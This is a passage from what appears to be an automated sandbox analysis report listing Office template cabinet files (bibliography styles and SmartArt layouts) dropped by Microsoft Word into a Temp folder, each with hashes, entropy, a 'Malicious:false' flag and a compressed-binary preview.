                                        SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                        Malicious:false
                                        Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.

                                        C:\Users\user\AppData\Local\Temp\cab8822.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31835
                                        Entropy (8bit):7.81952379746457
                                        Encrypted:false
                                        SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                        MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                        SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                        SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                        SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                        Malicious:false
                                        Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..

                                        C:\Users\user\AppData\Local\Temp\cab8823.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):30957
                                        Entropy (8bit):7.808231503692675
                                        Encrypted:false
                                        SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                        MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                        SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                        SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                        SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                        Malicious:false
                                        Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F

                                        C:\Users\user\AppData\Local\Temp\cab8824.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):20457
                                        Entropy (8bit):7.612540359660869
                                        Encrypted:false
                                        SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                        MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                        SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                        SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                        SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                        Malicious:false
                                        Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.

                                        C:\Users\user\AppData\Local\Temp\cab8825.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):20235
                                        Entropy (8bit):7.61176626859621
                                        Encrypted:false
                                        SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                        MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                        SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                        SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                        SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                        Malicious:false
                                        Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).

                                        C:\Users\user\AppData\Local\Temp\cab8858.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):25314
                                        Entropy (8bit):7.729848360340861
                                        Encrypted:false
                                        SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                        MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                        SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                        SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                        SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                        Malicious:false
                                        Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.

                                        C:\Users\user\AppData\Local\Temp\cab8859.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):32833
                                        Entropy (8bit):7.825460303519308
                                        Encrypted:false
                                        SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                        MD5:205AF51604EF96EF1E8E60212541F742
                                        SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                        SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                        SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                        Malicious:false
                                        Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..

                                        C:\Users\user\AppData\Local\Temp\cab885A.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):21357
                                        Entropy (8bit):7.641082043198371
                                        Encrypted:false
                                        SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                        MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                        SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                        SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                        SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                        Malicious:false
                                        Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.

                                        C:\Users\user\AppData\Local\Temp\cab885B.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):22149
                                        Entropy (8bit):7.659898883631361
                                        Encrypted:false
                                        SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                        MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                        SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                        SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                        SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                        Malicious:false
                                        Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A

                                        C:\Users\user\AppData\Local\Temp\cab885C.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):23597
                                        Entropy (8bit):7.692965575678876
                                        Encrypted:false
                                        SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                        MD5:7C645EC505982FE529D0E5035B378FFC
                                        SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                        SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                        SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                        Malicious:false
                                        Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7

                                        C:\Users\user\AppData\Local\Temp\cab885D.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):20554
                                        Entropy (8bit):7.612044504501488
                                        Encrypted:false
                                        SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                        MD5:486CBCB223B873132FFAF4B8AD0AD044
                                        SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                        SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                        SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                        Malicious:false
                                        Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....

                                        C:\Users\user\AppData\Local\Temp\cab885E.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31562
                                        Entropy (8bit):7.81640835713744
                                        Encrypted:false
                                        SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                        MD5:1D6F8E73A0662A48D332090A4C8C898F
                                        SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                        SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                        SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                        Malicious:false
                                        Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.

                                        C:\Users\user\AppData\Local\Temp\cab885F.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):19893
                                        Entropy (8bit):7.592090622603185
                                        Encrypted:false
                                        SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                        MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                        SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                        SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                        SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                        Malicious:false
                                        Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1

                                        C:\Users\user\AppData\Local\Temp\cab8860.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31008
                                        Entropy (8bit):7.806058951525675
                                        Encrypted:false
                                        SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                        MD5:E033CCBC7BA787A2F824CE0952E57D44
                                        SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                        SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                        SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                        Malicious:false
